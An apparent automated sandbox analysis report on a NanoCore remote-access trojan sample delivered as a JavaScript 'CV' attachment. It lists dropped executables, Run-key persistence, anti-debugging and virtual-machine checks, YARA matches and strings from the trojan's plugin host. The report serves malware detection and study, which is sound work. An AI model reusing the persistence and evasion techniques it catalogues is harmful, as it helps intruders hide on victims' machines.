        Source: 3.2.czkdqe.exe.4920000.9.unpack, u0023u003dqxoz66kOqvxr21iYXZYXWiumy9eZGwFWaiX4C5X8aecUu003d.cs.Net Code: #=qKU0J1fiP8KA33eFK1owekQ== System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_004059D5 push ecx; ret 2_2_004059E8
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 3_2_0040084B push edx; ret 3_2_0040085F
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 3_2_0040D2E1 push ecx; ret 3_2_0040D2F4
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0040B4A5 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0040B4A5
        Source: SCAN COPY CV 310123.jsString : entropy: 5.61, length: 515790, content: "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4AtAnNIbgGo to definition
        Source: 3.2.czkdqe.exe.4920000.9.unpack, u0023u003dqJT4I5hOweIku0024xYFEeDszbikglXCuquUdu0024v9AXtyq2nsu003d.csHigh entropy of concatenated method names: '#=qBeOBlH6CwHFnQdZWWBgZ_pemudZ6CfCVcfOQtgpeG$Y=', '#=q5v5cLSMFBaxiTtOEjscx86gN2ozXlfytiL6UmXnyWtg=', '#=q_XA5h2lVGHLcY9dK754wKGrOjAm6aBbwPxcUJXgJThJUz83kMbCL53G5uuOLP6Rq', '#=qIFfr$DrKqIieRc688$vylAlBsEnx9Z3$TxvrDsPURfM=', '#=qejgvNXJQvgM2GomZsygLjreyguSPQ29pQHqjR_a0dWk=', '#=qCGokdf0OOxeMJLDkXSfc3NPmwygIQ29RjKQWj$wbNGB9C1pPgma_891QiNyTRXcA', '#=qDqyUVyJLXCtYqhZ0$opqkomqhUBn2WCeEEvGAXlNQ$I=', '#=qdImPAY1o3YhbLtukwCQ91cISaeIEWRKSYrGZ3dTVnkY=', '#=qza7O1AHrroJC7yRIJz4wINR_Sgo4hDpQrj_OYfIrlJE=', '#=q6Ct3QmvVLFC7my$dL1uEiHGmXJ5qCuK4WIhDwfhPTFs='
        Source: 3.2.czkdqe.exe.4920000.9.unpack, u0023u003dqWrm21vQ8CBMZP_RBTwpusAu003du003d.csHigh entropy of concatenated method names: '#=qCgU$tDqtOAyz2b$RwfSF7UzBcCAr0rFJWxm16x7Lre0=', '#=qeD3MBfedCIuKIQf9V1u2N3YS4VXE_FOHqw_XAjWtZK8=', '#=q$mvEHEBkZud$AdHPWqsMQnw5Xm5sD4vBSSmqrKuXGOk=', '#=qZaN94n8dM6tBEf$qCdY2kbTZb5BOW8Z134$2tNv7EJs=', '#=qtlZnL8mho$rv1eTFz0Mw9UYFC_yCabEZ0xtVePn6wR5aSHE7ti3UfKg2l7D0_xk8', '#=qVS$QmQjvFfsXSqQAKGSl6HGbkse2SG0XCab4upVjtRJkvhTEk$oIS2I9Zja7id1Q', '#=qxJg7RxTW1v5mnt12xXeJiYJv_bcctbtL2BCD5MjDi45Hlz6t8vwDNTv1Rv7tgIct', '#=qp$ZVC1r9spi890l$D7IwEd3faoKeWHvv42mVq8wIIWM=', '#=qCoWHlVuoVRMkOzC7RZubJCslkxaEWn9yZiIydECf69$ktj0IPD5wAwC2H5Cc8C$L', '#=qqs1moO$mYaS72OXOWe0Z6GycslEb6e9Ipoy7ppW0O5abIp05ajv8doqdJZHlN3cK'
        Source: C:\Users\user\AppData\Roaming\vtvt.exeFile created: C:\Users\user\AppData\Local\Temp\czkdqe.exeJump to dropped file
        Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\vtvt.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeFile created: C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run wyhcmkdbbhwJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run wyhcmkdbbhwJump to behavior

        Hooking and other Techniques for Hiding and Protection

        barindex
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeFile opened: C:\Users\user\AppData\Local\Temp\czkdqe.exe:Zone.Identifier read attributes | deleteJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Roaming\vtvt.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

        Malware Analysis System Evasion

        barindex
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_2-8616
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exe TID: 5580Thread sleep time: -922337203685477s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeLast function: Thread delayed
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_2-7334
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_00590EBF GetSystemInfo,2_2_00590EBF
        Source: C:\Users\user\AppData\Roaming\vtvt.exeCode function: 1_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405D74
        Source: C:\Users\user\AppData\Roaming\vtvt.exeCode function: 1_2_0040699E FindFirstFileW,FindClose,1_2_0040699E
        Source: C:\Users\user\AppData\Roaming\vtvt.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 3_2_00406715 FindFirstFileExW,3_2_00406715
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Roaming\vtvt.exeAPI call chain: ExitProcess graph end nodegraph_1-3480
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeAPI call chain: ExitProcess graph end nodegraph_2-7273
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeAPI call chain: ExitProcess graph end nodegraph_3-13058
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeAPI call chain: ExitProcess graph end nodegraph_3-12986
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeAPI call chain: ExitProcess graph end nodegraph_3-12943
        Source: Amcache.hve.12.drBinary or memory string: VMware
        Source: Amcache.hve.12.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
        Source: Amcache.hve.12.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
        Source: Amcache.hve.12.drBinary or memory string: VMware Virtual USB Mouse
        Source: Amcache.hve.12.drBinary or memory string: VMware-42 35 9c fb 73 fa 4e 1b-fb a4 60 e7 7b e5 4a ed
        Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.
        Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
        Source: Amcache.hve.12.drBinary or memory string: Microsoft Hyper-V Generation Counter
        Source: Amcache.hve.12.drBinary or memory string: VMware7,1
        Source: Amcache.hve.12.drBinary or memory string: NECVMWar VMware SATA CD00
        Source: Amcache.hve.12.drBinary or memory string: VMware Virtual disk SCSI Disk Device
        Source: Amcache.hve.12.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
        Source: Amcache.hve.12.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
        Source: Amcache.hve.12.drBinary or memory string: VMware, Inc.me
        Source: Amcache.hve.12.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
        Source: Amcache.hve.12.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
        Source: Amcache.hve.12.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0040800D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040800D
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0040B4A5 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,2_2_0040B4A5
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0040E833 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,2_2_0040E833
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0059005F mov eax, dword ptr fs:[00000030h]2_2_0059005F
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0059017B mov eax, dword ptr fs:[00000030h]2_2_0059017B
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_00590109 mov eax, dword ptr fs:[00000030h]2_2_00590109
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0059013E mov eax, dword ptr fs:[00000030h]2_2_0059013E
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Roaming\jrwodjjaoqgx\vktp.exeProcess queried: DebugPortJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeMemory allocated: page read and write | page guardJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0040800D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_0040800D
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0040353D _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0040353D
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_004066DE SetUnhandledExceptionFilter,2_2_004066DE
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 3_2_00401E16 SetUnhandledExceptionFilter,3_2_00401E16
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 3_2_00401C83 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_00401C83
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 3_2_004060A4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_004060A4
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 3_2_00401F2A SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_00401F2A

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Windows\System32\wscript.exeFile created: vtvt.exe.0.drJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeSection loaded: unknown target: C:\Users\user\AppData\Local\Temp\czkdqe.exe protection: execute and read and writeJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Roaming\vtvt.exe "C:\Users\user\AppData\Roaming\vtvt.exe" Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeProcess created: C:\Users\user\AppData\Local\Temp\czkdqe.exe C:\Users\user\AppData\Local\Temp\czkdqe.exeJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 3_2_0040207B cpuid 3_2_0040207B
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\czkdqe.exeCode function: 2_2_0040758B GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,2_2_0040758B
        Source: C:\Users\user\AppData\Roaming\vtvt.exeCode function: 1_2_00403640 EntryPoint,SetErrorMode,GetVersionExW,GetVersionExW,GetVersionExW,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,ExitProcess,OleUninitialize,ExitProcess,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,1_2_00403640
        Source: Amcache.hve.12.drBinary or memory string: c:\program files\windows defender\msmpeng.exe

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: 3.2.czkdqe.exe.36631e4.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.23a0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.23a0000.3.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.366780d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.35e5530.5.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.36631e4.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.804368.2.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.417058.1.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.4920000.9.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.365e3ae.6.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.804368.2.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.35e5530.5.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 3.2.czkdqe.exe.417058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.342324519.00000000035E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.341497445.00000000007E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.342556936.0000000004922000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.341910417.00000000023A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: czkdqe.exe PID: 2264, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: czkdqe.exeString found in binary or memory: NanoCore.ClientPluginHost
        Source: czkdqe.exe, 00000003.00000002.341180010.0000000000415000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: czkdqe.exe, 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: czkdqe.exe, 00000003.00000002.342324519.000000000361C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttribute